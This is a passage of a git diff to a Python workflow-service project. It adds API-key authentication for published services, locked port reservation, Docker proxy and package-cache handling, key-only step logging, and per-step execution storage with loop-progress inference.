index 0f7393eb1..b286e2677 100644
--- a/flocks/workflow/center.py
+++ b/flocks/workflow/center.py
@@ -19,6 +19,7 @@
 import uuid
 from pathlib import Path
 from typing import Any, Dict, List, Optional
+from urllib.parse import urlparse, urlunparse
 from urllib import error as url_error
 from urllib import request as url_request
 
@@ -28,12 +29,15 @@
 from flocks.storage.storage import Storage
 from flocks.utils.log import Log
 from flocks.workflow.models import Workflow
+from flocks.workflow.requirements import resolve_python_package_index_url
+from flocks.workflow.visibility import is_hidden_workflow
 
 log = Log.create(service="workflow.center")
 
 _REGISTRY_PREFIX = "workflow_registry/"
 _RELEASE_PREFIX = "workflow_release/"
 _RUNTIME_PREFIX = "workflow_runtime/"
+_API_SERVICE_PREFIX = "workflow_api_service/"
 _SERVICE_DATA_DIR = "workflow-services"
 _DEFAULT_PORT_START = 19000
 _DEFAULT_PORT_END = 19999
@@ -44,9 +48,13 @@
 _DEFAULT_RUNTIME_INSTALL_HEALTH_RETRIES = 450  # 450 × 2s = 15 minutes
 _DEFAULT_STOP_TIMEOUT_S = 15.0
 _DEFAULT_LOCAL_STOP_GRACE_S = 5.0
+_SERVICE_API_KEY_ENV = "FLOCKS_WORKFLOW_SERVICE_API_KEY"
+_PORT_RESERVATION_TTL_S = 30 * 60
 
 # Service driver: "local" runs as a subprocess; "docker" runs in a container.
 _DEFAULT_SERVICE_DRIVER = "local"
+_PORT_ALLOCATION_LOCK = asyncio.Lock()
+_IN_FLIGHT_PORT_RESERVATIONS: Dict[int, float] = {}
 
 
 class WorkflowCenterError(Exception):
@@ -100,6 +108,17 @@ def _fingerprint(path: Path) -> str:
     return digest.hexdigest()
 
 
+def _generate_api_key() -> str:
+    return uuid.uuid4().hex + uuid.uuid4().hex
+
+
+def _workflow_service_auth_headers(runtime: Dict[str, Any]) -> Optional[Dict[str, str]]:
+    api_key = runtime.get("apiKey")
+    if not api_key:
+        return None
+    return {"x-api-key": str(api_key)}
+
+
 GLOBAL_WORKFLOW_ROOT: Path = Path.home() / ".flocks" / "workflow"
 
 
@@ -153,14 +172,84 @@ def _is_port_available(port: int) -> bool:
             return False
 
 
+def _port_from_service_url(value: Any) -> Optional[int]:
+    if not value:
+        return None
+    try:
+        parsed = urlparse(str(value))
+        return parsed.port
+    except (TypeError, ValueError):
+        return None
+
+
+def _ports_from_service_record(record: Any) -> set[int]:
+    if not isinstance(record, dict):
+        return set()
+
+    ports: set[int] = set()
+    for key in ("hostPort", "port"):
+        try:
+            port = int(record.get(key) or 0)
+        except (TypeError, ValueError):
+            port = 0
+        if 1 <= port <= 65535:
+            ports.add(port)
+
+    for key in ("serviceUrl", "invokeUrl"):
+        port = _port_from_service_url(record.get(key))
+        if port is not None:
+            ports.add(port)
+    return ports
+
+
+async def _reserved_service_ports() -> set[int]:
+    ports: set[int] = set()
+    for prefix in (_RUNTIME_PREFIX, _API_SERVICE_PREFIX, _REGISTRY_PREFIX):
+        try:
+            keys = await Storage.list_keys(prefix)
+        except Exception as exc:
+            log.warning("workflow.port.list_reserved_failed", {"prefix": prefix, "error": str(exc)})
+            continue
+
+        for key in keys:
+            try:
+                record = await Storage.read(key)
+            except Exception as exc:
+                log.warning("workflow.port.read_reserved_failed", {"key": _key_to_string(key), "error": str(exc)})
+                continue
+            ports.update(_ports_from_service_record(record))
+    return ports
+
+
+def _reserved_in_flight_ports() -> set[int]:
+    now = time.time()
+    expired = [
+        port
+        for port, expires_at in _IN_FLIGHT_PORT_RESERVATIONS.items()
+        if expires_at <= now
+    ]
+    for port in expired:
+        _IN_FLIGHT_PORT_RESERVATIONS.pop(port, None)
+    return set(_IN_FLIGHT_PORT_RESERVATIONS)
+
+
+def _release_port_reservation(port: Optional[int]) -> None:
+    if port is not None:
+        _IN_FLIGHT_PORT_RESERVATIONS.pop(port, None)
+
+
 async def _allocate_port() -> int:
     start = int(os.getenv("FLOCKS_WORKFLOW_SERVICE_PORT_START", str(_DEFAULT_PORT_START)))
     end = int(os.getenv("FLOCKS_WORKFLOW_SERVICE_PORT_END", str(_DEFAULT_PORT_END)))
     if start > end:
         raise WorkflowCenterError("Invalid workflow service port range")
-    for port in range(start, end + 1):
-        if _is_port_available(port):
-            return port
+    async with _PORT_ALLOCATION_LOCK:
+        reserved_ports = await _reserved_service_ports()
+        reserved_ports.update(_reserved_in_flight_ports())
+        for port in range(start, end + 1):
+            if port not in reserved_ports and _is_port_available(port):
+                _IN_FLIGHT_PORT_RESERVATIONS[port] = time.time() + _PORT_RESERVATION_TTL_S
+                return port
     raise WorkflowCenterError("No available workflow service port")
 
 
@@ -186,6 +275,14 @@ async def _scan_workflow_dir(
     for workflow_path in sorted(workflow_root.glob("*/workflow.json")):
         try:
             raw = json.loads(workflow_path.read_text(encoding="utf-8"))
+            meta_path = workflow_path.parent / "meta.json"
+            meta = (
+                json.loads(meta_path.read_text(encoding="utf-8"))
+                if meta_path.is_file()
+                else None
+            )
+            if is_hidden_workflow(raw, meta):
+                continue
             Workflow.from_dict(raw)
         except Exception as exc:
             log.warning(
@@ -303,6 +400,12 @@ def _service_release_file(workflow_id: str, release_id: str) -> Path:
     return base / f"{release_id}.json"
 
 
+def _service_cache_dir(name: str) -> Path:
+    cache_dir = Config.get_data_path() / _SERVICE_DATA_DIR / "cache" / name
+    cache_dir.mkdir(parents=True, exist_ok=True)
+    return cache_dir
+
+
 def _workflow_container_name(workflow_id: str, release_id: str) -> str:
     return f"flocks-wf-{workflow_id[:8]}-{release_id[:8]}"
 
@@ -342,11 +445,19 @@ def _host_service_url(port: int) -> str:
     return f"http://127.0.0.1:{port}"
 
 
-def _json_post(url: str, payload: Dict[str, Any], timeout_s: float = 10.0) -> Dict[str, Any]:
+def _json_post(
+    url: str,
+    payload: Dict[str, Any],
+    timeout_s: float = 10.0,
+    headers: Optional[Dict[str, str]] = None,
+) -> Dict[str, Any]:
+    request_headers = {"Content-Type": "application/json"}
+    if headers:
+        request_headers.update(headers)
     request = url_request.Request(
         url=url,
         data=json.dumps(payload).encode("utf-8"),
-        headers={"Content-Type": "application/json"},
+        headers=request_headers,
         method="POST",
     )
     with url_request.urlopen(request, timeout=timeout_s) as response:
@@ -374,6 +485,91 @@ async def _wait_service_healthy(service_url: str, retries: int = 20, interval_s:
     return False
 
 
+def _docker_proxy_env_value(env_value: str) -> str:
+    """Translate host loopback proxy URLs so containers can reach them."""
+    raw = (env_value or "").strip()
+    if not raw:
+        return env_value
+
+    has_scheme = "://" in raw
+    parse_input = raw if has_scheme else f"http://{raw}"
+    try:
+        parsed = urlparse(parse_input)
+        hostname = (parsed.hostname or "").lower()
+        if hostname not in {"127.0.0.1", "localhost", "::1"}:
+            return env_value
+
+        userinfo = ""
+        if parsed.username:
+            userinfo = parsed.username
+            if parsed.password:
+                userinfo += f":{parsed.password}"
+            userinfo += "@"
+        netloc = f"{userinfo}host.docker.internal"
+        if parsed.port:
+            netloc += f":{parsed.port}"
+        rewritten = urlunparse((
+            parsed.scheme,
+            netloc,
+            parsed.path,
+            parsed.params,
+            parsed.query,
+            parsed.fragment,
+        ))
+        if not has_scheme and rewritten.startswith("http://"):
+            return rewritten[len("http://"):]
+        return rewritten
+    except Exception:
+        return env_value
+
+
+def _docker_proxy_uses_host_gateway(env_value: str) -> bool:
+    raw = (env_value or "").strip()
+    if not raw:
+        return False
+    parse_input = raw if "://" in raw else f"http://{raw}"
+    try:
+        return (urlparse(parse_input).hostname or "").lower() == "host.docker.internal"
+    except Exception:
+        return False
+
+
+async def _docker_logs_tail(container_name: str, *, lines: int = 80) -> str:
+    stdout, stderr, _ = await exec_docker(
+        ["logs", "--tail", str(lines), container_name],
+        allow_failure=True,
+        timeout_s=10,
+    )
+    return (stdout or stderr or "").strip()
+
+
+async def _wait_docker_service_healthy(
+    service_url: str,
+    container_name: str,
+    *,
+    retries: int,
+    interval_s: float,
+) -> bool:
+    for _ in range(retries):
+        try:
+            payload = await asyncio.to_thread(_json_get, f"{service_url}/health", 2.0)
+            if payload.get("ok") is True:
+                return True
+        except Exception:
+            pass
+
+        state = await docker_container_state(container_name)
+        if state.get("exists") and not state.get("running"):
+            logs = await _docker_logs_tail(container_name)
+            detail = logs or "container exited before reporting healthy"
+            raise WorkflowCenterError(
+                "Published workflow service container exited before health check "
+                f"passed: {detail}"
+            )
+        await asyncio.sleep(interval_s)
+    return False
+
+
 async def _stop_and_remove_container(container_name: str) -> bool:
     _, stderr, code = await exec_docker(
         ["rm", "-f", container_name],
@@ -553,7 +749,7 @@ async def _stop_existing_runtime_for_publish(workflow_id: str) -> None:
         await _stop_local_service(workflow_id)
 
 
-async def publish_workflow_local(workflow_id: str) -> Dict[str, Any]:
+async def publish_workflow_local(workflow_id: str, *, api_key: Optional[str] = None) -> Dict[str, Any]:
     """Publish a workflow as a local subprocess using the current Python env.
 
     This is the default driver for development: no Docker, instant startup,
@@ -580,58 +776,75 @@ async def publish_workflow_local(workflow_id: str) -> Dict[str, Any]:
     host_port = await _allocate_port()
     service_url = _host_service_url(host_port)
     service_key = workflow_id
+    runtime_api_key = api_key or _generate_api_key()
 
-    env = os.environ.copy()
-    proc = await asyncio.create_subprocess_exec(
-        sys.executable,
-        "-m", "flocks.workflow.service_runtime",
-        "--workflow", str(release_snapshot_file),
-        "--workflow-id", workflow_id,
-        "--release-id", release_id,
-        "--host", "127.0.0.1",
-        "--port", str(host_port),
-        stdout=asyncio.subprocess.DEVNULL,
-        stderr=asyncio.subprocess.DEVNULL,
-        env=env,
-        start_new_session=True,
-    )
+    proc: asyncio.subprocess.Process | None = None
+    try:
+        env = os.environ.copy()
+        env[_SERVICE_API_KEY_ENV] = runtime_api_key
+        proc = await asyncio.create_subprocess_exec(
+            sys.executable,
+            "-m", "flocks.workflow.service_runtime",
+            "--workflow", str(release_snapshot_file),
+            "--workflow-id", workflow_id,
+            "--release-id", release_id,
+            "--host", "127.0.0.1",
+            "--port", str(host_port),
+            stdout=asyncio.subprocess.DEVNULL,
+            stderr=asyncio.subprocess.DEVNULL,
+            env=env,
+            start_new_session=True,
+        )
 
-    await Storage.write(_local_pid_key(workflow_id), {
-        "pid": proc.pid,
-        "processGroupId": proc.pid,
-        "port": host_port,
-    })
+        await Storage.write(_local_pid_key(workflow_id), {
+            "pid": proc.pid,
+            "processGroupId": proc.pid,
+            "port": host_port,
+        })
 
-    health_retries = int(os.getenv("FLOCKS_WORKFLOW_SERVICE_HEALTH_RETRIES", str(_DEFAULT_HEALTH_RETRIES)))
-    health_interval_s = float(os.getenv("FLOCKS_WORKFLOW_SERVICE_HEALTH_INTERVAL_S", str(_DEFAULT_HEALTH_INTERVAL_S)))
+        health_retries = int(os.getenv("FLOCKS_WORKFLOW_SERVICE_HEALTH_RETRIES", str(_DEFAULT_HEALTH_RETRIES)))
+        health_interval_s = float(os.getenv("FLOCKS_WORKFLOW_SERVICE_HEALTH_INTERVAL_S", str(_DEFAULT_HEALTH_INTERVAL_S)))
 
-    healthy = await _wait_service_healthy(service_url, retries=health_retries, interval_s=health_interval_s)
-    if not healthy:
-        try:
-            await _stop_local_service(workflow_id)
-        except Exception:
-            pass
+        healthy = await _wait_service_healthy(service_url, retries=health_retries, interval_s=health_interval_s)
+        if not healthy:
+            try:
+                await _stop_local_service(workflow_id)
+            except Exception:
+                pass
+            raise WorkflowCenterError("Local workflow service failed health check")
+
+        active_record = {
+            "releaseId": release_id,
+            "workflowId": workflow_id,
+            "serviceKey": service_key,
+            "containerName": f"local-{workflow_id[:8]}-{release_id[:8]}",
+            "containerId": str(proc.pid),
+            "processGroupId": proc.pid,
+            "image": "local",
+            "hostPort": host_port,
+            "serviceUrl": service_url,
+            "status": "active",
+            "updatedAt": _now_ms(),
+            "driver": "local",
+            "apiKey": runtime_api_key,
+        }
+        await Storage.write(_active_release_key(workflow_id), active_record)
+        await Storage.write(_runtime_key(workflow_id), active_record)
+        _release_port_reservation(host_port)
+    except Exception as exc:
+        _release_port_reservation(host_port)
+        if proc is not None:
+            try:
+                _signal_local_process(proc.pid, signal.SIGTERM, proc.pid)
+                await _wait_for_pid_exit(proc.pid, 1.0)
+            except Exception:
+                pass
         registry["publishStatus"] = "failed"
         registry["updatedAt"] = _now_ms()
         await Storage.write(_registry_key(workflow_id), registry)
-        raise WorkflowCenterError("Local workflow service failed health check")
-
-    active_record = {
-        "releaseId": release_id,
-        "workflowId": workflow_id,
-        "serviceKey": service_key,
-        "containerName": f"local-{workflow_id[:8]}-{release_id[:8]}",
-        "containerId": str(proc.pid),
-        "processGroupId": proc.pid,
-        "image": "local",
-        "hostPort": host_port,
-        "serviceUrl": service_url,
-        "status": "active",
-        "updatedAt": _now_ms(),
-        "driver": "local",
-    }
-    await Storage.write(_active_release_key(workflow_id), active_record)
-    await Storage.write(_runtime_key(workflow_id), active_record)
+        if isinstance(exc, WorkflowCenterError):
+            raise
+        raise WorkflowCenterError(str(exc)) from exc
 
     registry["publishStatus"] = "active"
     registry["activeReleaseId"] = release_id
@@ -669,14 +882,15 @@ async def publish_workflow(
     workflow_id: str,
     image: Optional[str] = None,
     driver: Optional[str] = None,
+    api_key: Optional[str] = None,
 ) -> Dict[str, Any]:
     """Publish a workflow using the configured service driver (local or docker)."""
     resolved_driver = (driver or _service_driver()).strip().lower()
     if resolved_driver == "docker":
-        return await _publish_workflow_docker(workflow_id, image=image)
+        return await _publish_workflow_docker(workflow_id, image=image, api_key=api_key)
     if resolved_driver != "local":
         raise WorkflowCenterError(f"Unsupported workflow service driver: {resolved_driver}")
-    return await publish_workflow_local(workflow_id)
+    return await publish_workflow_local(workflow_id, api_key=api_key)
 
 
 async def stop_workflow_service(workflow_id: str) -> Dict[str, Any]:
@@ -692,7 +906,12 @@ async def stop_workflow_service(workflow_id: str) -> Dict[str, Any]:
     return await stop_local_service(workflow_id)
 
 
-async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None) -> Dict[str, Any]:
+async def _publish_workflow_docker(
+    workflow_id: str,
+    image: Optional[str] = None,
+    *,
+    api_key: Optional[str] = None,
+) -> Dict[str, Any]:
     """Publish a registered workflow as a Docker service container."""
     registry = await _read_registry(workflow_id)
     workflow_path = Path(str(registry["workflowPath"]))
@@ -748,7 +967,10 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
     )
     project_root = Path.cwd().resolve()
     user_config_dir = Config.get_config_path().resolve()
+    pip_cache_dir = _service_cache_dir("pip")
+    uv_cache_dir = _service_cache_dir("uv")
     service_key = workflow_id
+    runtime_api_key = api_key or _generate_api_key()
 
     cmd = [
         "run",
@@ -761,6 +983,10 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
         f"{project_root}:/app:ro",
         "-v",
         f"{release_runtime_dir}:/runtime",
+        "-v",
+        f"{pip_cache_dir}:/root/.cache/pip",
+        "-v",
+        f"{uv_cache_dir}:/root/.cache/uv",
         "-w",
         "/runtime",
         "-e",
@@ -769,6 +995,10 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
         "FLOCKS_CONFIG_DIR=/runtime/.flocks-config",
         "-e",
         "FLOCKS_CONFIG=/runtime/.flocks-config/flocks.json",
+        "-e",
+        f"{_SERVICE_API_KEY_ENV}={runtime_api_key}",
+        "-e",
+        "UV_CACHE_DIR=/root/.cache/uv",
         image_name,
     ]
     if user_config_dir.exists():
@@ -788,22 +1018,41 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
         "no_proxy",
     ]
     proxy_injections: List[str] = []
+    needs_host_gateway = False
     for env_name in proxy_env_names:
         env_value = os.getenv(env_name)
         if env_value:
-            proxy_injections.extend(["-e", f"{env_name}={env_value}"])
+            docker_env_value = _docker_proxy_env_value(env_value)
+            if _docker_proxy_uses_host_gateway(docker_env_value):
+                needs_host_gateway = True
+            proxy_injections.extend(["-e", f"{env_name}={docker_env_value}"])
     if proxy_injections:
+        if needs_host_gateway:
+            cmd[cmd.index(image_name):cmd.index(image_name)] = [
+                "--add-host",
+                "host.docker.internal:host-gateway",
+            ]
         cmd[cmd.index(image_name):cmd.index(image_name)] = proxy_injections
+    python_index_url = resolve_python_package_index_url()
+    if python_index_url:
+        cmd[cmd.index(image_name):cmd.index(image_name)] = [
+            "-e",
+            f"PIP_INDEX_URL={python_index_url}",
+            "-e",
+            f"UV_DEFAULT_INDEX={python_index_url}",
+        ]
     if runtime_install:
+        uv_bootstrap_cmd = "python -m pip install uv"
         if has_requirements_snapshot:
             # Pre-install all pinned deps from requirements.txt (no resolver = fast),
             # then install the project itself without re-resolving deps.
             install_cmd = (
-                "pip install --no-cache-dir -r /runtime/requirements.txt && "
-                "pip install --no-cache-dir --no-deps /app"
+                f"{uv_bootstrap_cmd} && "
+                "uv pip install --system -r /runtime/requirements.txt && "
+                "uv pip install --system --no-deps /app"
             )
         else:
-            install_cmd = "pip install --no-cache-dir /app"
+            install_cmd = f"{uv_bootstrap_cmd} && uv pip install --system /app"
         service_cmd = (
             f"{install_cmd} && "
             "python -m flocks.workflow.service_runtime "
@@ -837,8 +1086,9 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
         stdout, _, _ = await exec_docker(cmd)
         container_id = stdout.strip()
         service_url = _host_service_url(host_port)
-        healthy = await _wait_service_healthy(
+        healthy = await _wait_docker_service_healthy(
             service_url,
+            container_name,
             retries=health_retries,
             interval_s=health_interval_s,
         )
@@ -861,9 +1111,11 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
             "status": "active",
             "updatedAt": _now_ms(),
             "driver": "docker",
+            "apiKey": runtime_api_key,
         }
         await Storage.write(_active_release_key(workflow_id), active_record)
         await Storage.write(_runtime_key(workflow_id), active_record)
+        _release_port_reservation(host_port)
 
         registry["publishStatus"] = "active"
         registry["activeReleaseId"] = release_id
@@ -886,6 +1138,7 @@ async def _publish_workflow_docker(workflow_id: str, image: Optional[str] = None
 
         return active_record
     except Exception as exc:
+        _release_port_reservation(host_port)
         await _stop_and_remove_container(container_name)
         release_record["status"] = "failed"
         release_record["deactivatedAt"] = _now_ms()
@@ -1015,7 +1268,13 @@ async def invoke_published_workflow(
         payload["timeout_s"] = timeout_s
 
     try:
-        result = await asyncio.to_thread(_json_post, f"{service_url}/invoke", payload, timeout_s or 30.0)
+        result = await asyncio.to_thread(
+            _json_post,
+            f"{service_url}/invoke",
+            payload,
+            timeout_s or 30.0,
+            _workflow_service_auth_headers(runtime),
+        )
         result.setdefault("workflowId", workflow_id)
         result.setdefault("releaseId", runtime.get("releaseId"))
         return result
diff --git a/flocks/workflow/engine.py b/flocks/workflow/engine.py
index b47fb2303..60c86ea98 100644
--- a/flocks/workflow/engine.py
+++ b/flocks/workflow/engine.py
@@ -144,7 +144,7 @@ class WorkflowEngine:
     mutate_workflow: bool = False
     workflow_path: Optional[str] = None
     node_timeout_s: Optional[float] = 300.0
-    history_mode: Literal["full", "summary"] = "full"
+    history_mode: Literal["full", "summary"] = "summary"
     _depth: int = 0
     max_parallel_workers: int = 4
     workflow_loader: Optional[Callable[[str], "Workflow"]] = field(default=None, repr=False)
@@ -193,6 +193,7 @@ def run(
         cancel: Optional[Callable[[], bool]] = None,
         on_step_start: Optional[StepStartHook[Any]] = None,
         on_step_end: Optional[StepEndHook[Any]] = None,
+        retain_history: bool = False,
     ) -> ExecutionResult:
         assert self.runtime is not None
         nodes = self.workflow.nodes_by_id()
@@ -224,6 +225,10 @@ def run(
             previous_cancel_checker = self.runtime.cancel_checker
             self.runtime.cancel_checker = cancel
         try:
+            def _retain_step(step: StepResult) -> None:
+                if retain_history:
+                    history.append(step)
+
             def _build_execution_context() -> Dict[str, Any]:
                 return {
                     "run_id": rid,
@@ -499,7 +504,7 @@ def _build_step_result(
                             error=_eo.error or "Run cancelled",
                             traceback_text=_eo.traceback,
                         )
-                        history.append(step_res)
+                        _retain_step(step_res)
                         if on_step_end is not None and _eo.idx in step_tokens:
                             try:
                                 on_step_end(step_tokens[_eo.idx], step_res)
@@ -525,7 +530,7 @@ def _build_step_result(
                             error=_eo.error,
                             traceback_text=_eo.traceback,
                         )
-                        history.append(step_res)
+                        _retain_step(step_res)
                         _status = "timeout" if _eo.is_timeout else "error"
                         (_logger.warning if _eo.is_timeout else _logger.error)(
                             f"wf.step.{_status}",
@@ -535,17 +540,29 @@ def _build_step_result(
                                 **({"timeout_s": self.node_timeout_s} if _eo.is_timeout else {"traceback": (_eo.traceback or "")[:500]}),
                             },
                         )
+                        outputs_keys = list(_eo.outputs.keys())
                         _logger.info(
-                            "wf.step.end step=%s node=%s type=%s status=%s duration_ms=%.3f outputs=%s error=%s",
-                            _sn, _nid, _nd.type, _status, _eo.duration_ms,
-                            _outputs_for_log(_eo.outputs), _eo.error,
+                            "wf.step.end step=%s node=%s type=%s status=%s duration_ms=%.3f outputs_keys=%s",
+                            _sn, _nid, _nd.type, _status, _eo.duration_ms, outputs_keys,
                             extra={
                                 "run_id": rid, "step": _sn, "node_id": _nid,
                                 "node_type": _nd.type, "status": _status,
-                                "duration_ms": _eo.duration_ms, "outputs_keys": list(_eo.outputs.keys()),
-                                "outputs": _outputs_for_log(_eo.outputs), "error": _eo.error,
+                                "duration_ms": _eo.duration_ms, "outputs_keys": outputs_keys,
+                                "error": _eo.error,
                             },
                         )
+                        if _logger.isEnabledFor(logging.DEBUG):
+                            outputs_for_debug = _outputs_for_log(_eo.outputs)
+                            _logger.debug(
+                                "wf.step.outputs step=%s node=%s status=%s outputs=%s",
+                                _sn, _nid, _status, outputs_for_debug,
+                                extra={
+                                    "run_id": rid, "step": _sn, "node_id": _nid,
+                                    "node_type": _nd.type, "status": _status,
+                                    "outputs": outputs_for_debug,
+                                    "error": _eo.error,
+                                },
+                            )
                         if on_step_end is not None and _eo.idx in step_tokens:
                             try:
                                 on_step_end(step_tokens[_eo.idx], step_res)
@@ -562,6 +579,7 @@ def _build_step_result(
                                     "run_id": rid,
                                     "steps": step_count + len(exec_results),
                                     "last_node_id": _nid,
+                                    "outputs": last_outputs,
                                     "history": history,
                                 },
                             )
@@ -580,17 +598,30 @@ def _build_step_result(
                             stdout=_eo.stdout,
                             error=None,
                         )
-                        history.append(step_res)
+                        _retain_step(step_res)
+                        outputs_keys = list(_eo.outputs.keys())
                         _logger.info(
-                            "wf.step.end step=%s node=%s type=%s status=%s duration_ms=%.3f outputs=%s",
-                            _sn, _nid, _nd.type, "ok", _eo.duration_ms, _outputs_for_log(_eo.outputs),
+                            "wf.step.end step=%s node=%s type=%s status=%s duration_ms=%.3f outputs_keys=%s",
+                            _sn, _nid, _nd.type, "ok", _eo.duration_ms, outputs_keys,
                             extra={
                                 "run_id": rid, "step": _sn, "node_id": _nid,
                                 "node_type": _nd.type, "status": "ok",
-                                "duration_ms": _eo.duration_ms, "outputs_keys": list(_eo.outputs.keys()),
-                                "outputs": _outputs_for_log(_eo.outputs), "error": None,
+                                "duration_ms": _eo.duration_ms, "outputs_keys": outputs_keys,
+                                "error": None,
                             },
                         )
+                        if _logger.isEnabledFor(logging.DEBUG):
+                            outputs_for_debug = _outputs_for_log(_eo.outputs)
+                            _logger.debug(
+                                "wf.step.outputs step=%s node=%s status=%s outputs=%s",
+                                _sn, _nid, "ok", outputs_for_debug,
+                                extra={
+                                    "run_id": rid, "step": _sn, "node_id": _nid,
+                                    "node_type": _nd.type, "status": "ok",
+                                    "outputs": outputs_for_debug,
+                                    "error": None,
+                                },
+                            )
                         if on_step_end is not None and _eo.idx in step_tokens:
                             try:
                                 on_step_end(step_tokens[_eo.idx], step_res)
@@ -877,7 +908,7 @@ def _execute_subworkflow_node(
             workflow_loader=self.workflow_loader,
         )
         result = sub_engine.run(initial_inputs=sub_inputs)
-        last_outputs = result.history[-1].outputs if result.history else {}
+        last_outputs = result.outputs or (result.history[-1].outputs if result.history else {})
         output_k = node.output_key or "output"
         return {output_k: last_outputs}, ""
 
diff --git a/flocks/workflow/execution_store.py b/flocks/workflow/execution_store.py
index 8bc6b3309..98ada8c44 100644
--- a/flocks/workflow/execution_store.py
+++ b/flocks/workflow/execution_store.py
@@ -6,7 +6,7 @@
 import re
 import time
 import uuid
-from typing import Any, Dict, Iterable, List, Optional, Set
+from typing import Any, Callable, Dict, Iterable, List, Optional, Set, Tuple
 
 from flocks.session.recorder import Recorder
 from flocks.storage.storage import Storage
@@ -82,6 +82,8 @@ def compact_step_for_storage(
     size_threshold: int = DEFAULT_COMPACT_SIZE_THRESHOLD,
 ) -> Any:
     """Return a copy of one history step with large ``inputs``/``outputs`` compacted."""
+    if not isinstance(step, dict) and hasattr(step, "model_dump"):
+        step = step.model_dump(mode="json")
     if not isinstance(step, dict):
         return step
     step_copy = dict(step)
@@ -113,6 +115,90 @@ def compact_history_for_storage(
         for step in history
     ]
 
+
+def _first_value(data: Dict[str, Any], keys: Iterable[str]) -> Any:
+    for key in keys:
+        value = data.get(key)
+        if value not in (None, ""):
+            return value
+    return None
+
+
+def _as_positive_int(value: Any) -> Optional[int]:
+    if isinstance(value, bool):
+        return None
+    if isinstance(value, int) and value > 0:
+        return value
+    if isinstance(value, float) and value > 0 and value.is_integer():
+        return int(value)
+    if isinstance(value, str):
+        try:
+            parsed = int(value)
+        except ValueError:
+            return None
+        return parsed if parsed > 0 else None
+    return None
+
+
+def derive_loop_progress(
+    *,
+    node_id: Optional[str],
+    global_step_index: int,
+    inputs: Optional[Dict[str, Any]] = None,
+    outputs: Optional[Dict[str, Any]] = None,
+) -> Optional[Dict[str, Any]]:
+    """Infer loop progress metadata from common workflow counter fields.
+
+    Workflows often carry their global loop state in normal inputs/outputs
+    (for example ``iteration``/``total_iterations``/``current_item``).  The
+    engine currently exposes only node-level callbacks, so this helper derives
+    a best-effort loop snapshot without changing the runtime data flow.
+    """
+    merged: Dict[str, Any] = {}
+    if isinstance(inputs, dict):
+        merged.update(inputs)
+    if isinstance(outputs, dict):
+        merged.update(outputs)
+
+    iteration = _as_positive_int(_first_value(
+        merged,
+        ("iteration", "loop_index", "current_index", "item_idx", "item_index", "host_idx"),
+    ))
+    total = _as_positive_int(_first_value(
+        merged,
+        (
+            "total_iterations",
+            "total_items",
+            "item_count",
+            "items_count",
+            "total_hosts",
+            "host_count",
+            "hosts_count",
+            "hosts_total",
+        ),
+    ))
+    if total is None:
+        hosts = merged.get("hosts")
+        if isinstance(hosts, list):
+            total = len(hosts)
+
+    current_item = _first_value(
+        merged,
+        ("current_item", "item", "current_host", "last_host", "host", "ssh_target", "last_ssh_target"),
+    )
+
+    if iteration is None and total is None and current_item is None:
+        return None
+
+    return {
+        "loop_node_id": merged.get("loop_node_id") or merged.get("loop_id"),
+        "iteration": iteration,
+        "total_iterations": total,
+        "current_item": current_item,
+        "current_inner_node_id": node_id,
+        "global_step_index": global_step_index,
+    }
+
 # Maximum number of execution history records retained per workflow.
 # Keep this intentionally small so high-frequency workflows do not keep
 # inflating the SQLite row set and matching JSONL audit files indefinitely.
@@ -194,6 +280,139 @@ def workflow_execution_key(exec_id: str) -> str:
     return f"workflow_execution/{exec_id}"
 
 
+def workflow_execution_step_key(exec_id: str, step_index: int) -> str:
+    """Return the storage key for one workflow execution step."""
+    return f"workflow_execution_step/{exec_id}/{step_index:08d}"
+
+
+def workflow_execution_step_prefix(exec_id: str) -> str:
+    """Return the storage key prefix for all steps of one execution."""
+    return f"workflow_execution_step/{exec_id}/"
+
+
+def compact_execution_summary(exec_data: Dict[str, Any]) -> Dict[str, Any]:
+    """Return an execution record safe to keep in the hot summary row.
+
+    Step details are stored separately under ``workflow_execution_step`` keys.
+    Keeping ``executionLog`` out of the summary row avoids rewriting an
+    ever-growing JSON blob on every progress update.
+    """
+    summary = dict(exec_data)
+    summary["executionLog"] = []
+    return summary
+
+
+async def record_execution_step(
+    exec_id: str,
+    step_index: int,
+    step: Dict[str, Any],
+) -> Dict[str, Any]:
+    """Persist one compacted execution step and return the stored payload."""
+    step_payload = compact_step_for_storage(step)
+    await Storage.write(workflow_execution_step_key(exec_id, step_index), step_payload)
+    return step_payload
+
+
+class ExecutionStepRecorder:
+    """Bridge synchronous workflow step callbacks to append-only step rows."""
+
+    def __init__(
+        self,
+        *,
+        exec_id: str,
+        loop: asyncio.AbstractEventLoop,
+        logger: Any = None,
+        log_event: str = "workflow.execution_step.write_failed",
+        step_compactor: Callable[[Any], Dict[str, Any]] = compact_step_for_storage,
+        write_timeout_s: float = 5.0,
+    ) -> None:
+        self.exec_id = exec_id
+        self.loop = loop
+        self.logger = logger or log
+        self.log_event = log_event
+        self.step_compactor = step_compactor
+        self.write_timeout_s = write_timeout_s
+        self.step_count = 0
+        self.summary: Dict[str, Any] = {}
+
+    def on_step_complete(self, step_result: Any) -> None:
+        raw_step = step_result.model_dump(mode="json") if hasattr(step_result, "model_dump") else step_result
+        step_dict = self.step_compactor(raw_step)
+        if not isinstance(step_dict, dict):
+            return
+
+        self.step_count += 1
+        loop_progress = derive_loop_progress(
+            node_id=step_dict.get("node_id"),
+            global_step_index=self.step_count,
+            inputs=step_dict.get("inputs"),
+            outputs=step_dict.get("outputs"),
+        )
+        self.summary.update({
+            "stepCount": self.step_count,
+            "currentNodeId": step_dict.get("node_id"),
+            "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
+            "currentPhase": "running",
+            "currentStepIndex": self.step_count,
+            "loopProgress": loop_progress,
+            "updatedAt": int(time.time() * 1000),
+        })
+        try:
+            asyncio.run_coroutine_threadsafe(
+                record_execution_step(self.exec_id, self.step_count, step_dict),
+                self.loop,
+            ).result(timeout=self.write_timeout_s)
+        except Exception as exc:
+            self.logger.warning(self.log_event, {
+                "exec_id": self.exec_id,
+                "step_index": self.step_count,
+                "error": str(exc),
+            })
+
+
+async def _backfill_execution_steps(
+    exec_id: str,
+    execution_log: Any,
+) -> int:
